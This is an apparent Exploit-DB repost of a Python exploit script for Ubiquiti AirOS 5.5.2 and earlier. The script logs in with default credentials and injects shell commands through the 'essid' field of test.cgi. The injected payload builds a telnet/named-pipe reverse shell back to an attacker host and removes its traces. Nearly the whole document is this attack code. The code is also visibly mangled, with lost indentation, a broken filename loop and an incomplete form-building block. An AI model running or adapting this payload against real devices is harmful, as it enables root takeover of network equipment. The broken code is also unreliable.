Ubiquiti AirOS 5.5.2 – (Authenticated) Remote Command Execution

  • 作者: xistence
    日期: 2012-12-29
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/23735/
  • #!/usr/bin/python
    # Exploit Title : Ubiquiti AirOS <= 5.5.2 Remote POST-Auth Root Command Execution
    # Date: 12-28-2012
    # Author: xistence (xistence<[AT]>0x90.nl)
    # Software link : http://www.ubnt.com/eula/?BACK=/downloads/XM-v5.5.2.build14175.bin
    # Vendor site : http://www.ubnt.com/
    # Version : 5.5.2 and lower
    # Tested on : PicoStation M2 (hardware)
    # Vulnerability : The http://<IP>/test.cgi "essid" parameter is not sanitized for input which allows for execution of operating
    # system commands. The parameter input field can be like this to create a file /tmp/test.txt:
    # "LINKTEST & /bin/touch /tmp/test.txt #"
    #		Authentication to the web site is necessary to exploit this vulnerability. 
    import urllib, urllib2, cookielib, sys, random, mimetools, mimetypes, itertools, time
    print ""
    print "[*] Ubiquiti AirOS <= 5.5.2 Remote POST-Auth Root Command Execution - xistence (xistence<[at]>0x90.nl) - 2012-12-28"
    print ""
    if (len(sys.argv) != 4):
    print "[*] Usage: " + sys.argv[0] + " <rhost> <lhost> <lport>"
    print ""
    rhost = sys.argv[1]
    lhost = sys.argv[2]
    lport = sys.argv[3]
    webUser = "ubnt"
    webPass = "ubnt"
    # Create a random file with 8 characters
    filename = ''
    for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',8):
    filename +=".sh"
    shellCmd = '& echo "mknod /tmp/backpipe p ; telnet ' + lhost + ' ' + lport + ' 0</tmp/backpipe | /bin/sh -C 1>/tmp/backpipe 2>/tmp/backpipe ; rm -rf /tmp/backpipe ; rm -rf /tmp/' + filename + '" > /tmp/' + filename + ' ; chmod +x /tmp/' + filename + ' ; /bin/sh /tmp/' + filename + ' #'
    class MultiPartForm(object):
    """Accumulate the data to be used when posting a form."""
    def __init__(self):
    self.form_fields = []
    self.files = []
    self.boundary = mimetools.choose_boundary()
    def get_content_type(self):
    return 'multipart/form-data; boundary=%s' % self.boundary
    def add_field(self, name, value):
    """Add a simple field to the form data."""
    self.form_fields.append( ( name, value ) )
    def __str__(self):
    """Return a string representing the form data, including attached files."""
    # Build a list of lists, each containing "lines" of the
    # request.Each part is separated by a boundary string.
    # Once the list is built, return a string where each
    # line is separated by '\r\n'.
    parts = []
    part_boundary = '--' + self.boundary
    # Add the form fields
    [ part_boundary,
    'Content-Disposition: form-data; name="%s"' % name,
    for name, value in self.form_fields
    # Flatten the list and add closing boundary marker,
    # then return CR+LF separated data
    flattened = list( itertools.chain( *parts) )
    flattened.append( '--' + self.boundary + '--' )
    flattened.append( '' )
    return '\r\n'.join( flattened )
    # Create the form with simple fields
    form = MultiPartForm()
    form.add_field( 'uri', '' )
    form.add_field( 'username', webUser )
    form.add_field( 'password', webPass )
    form2 = MultiPartForm()
    form2.add_field( 'essid', 'LINKTEST ' + shellCmd )
    form2.add_field( 'channel', '2412' )
    form2.add_field( 'rssithresh', '13' )
    form2.add_field( 'file_url', '' )
    form2.add_field( 'action', 'test' )
    # Our Cookie Jar
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener( urllib2.HTTPCookieProcessor( cj ) )
    # Just open the default url to grab the cookies and put them in the jar
    print "[+] Opening default page [http://%s] to store cookies" % rhost
    resp = opener.open( "http://%s" %rhost )
    # Create our multi-part body + headers login POST request
    print "[+] Logging in with user [%s] and password [%s] at host [%s]" % ( webUser, webPass, rhost )
    resp = urllib2.Request( "http://%s/login.cgi" % rhost )
    body = str( form )
    resp.add_header( 'Content-type', form.get_content_type() )
    resp.add_header( 'Content-length', len( body ) )
    resp.add_data( body )
    request = opener.open( resp ).read()
    # Create our multi-part body + headers command execution POST request
    print "[+] Executing reverse shell commands [file = /tmp/" + filename + "], this might take up to a minute before a response is received in your netcat shell"
    resp = urllib2.Request( "http://%s/test.cgi" % rhost )
    body = str( form2 )
    resp.add_header( 'Content-type', form2.get_content_type() )
    resp.add_header( 'Content-length', len( body ) )
    resp.add_data( body )
    request = opener.open( resp ).read()
    print "[+] Done, check your netcat reverse shell on ip [%s] port [%s]" % ( lhost, lport )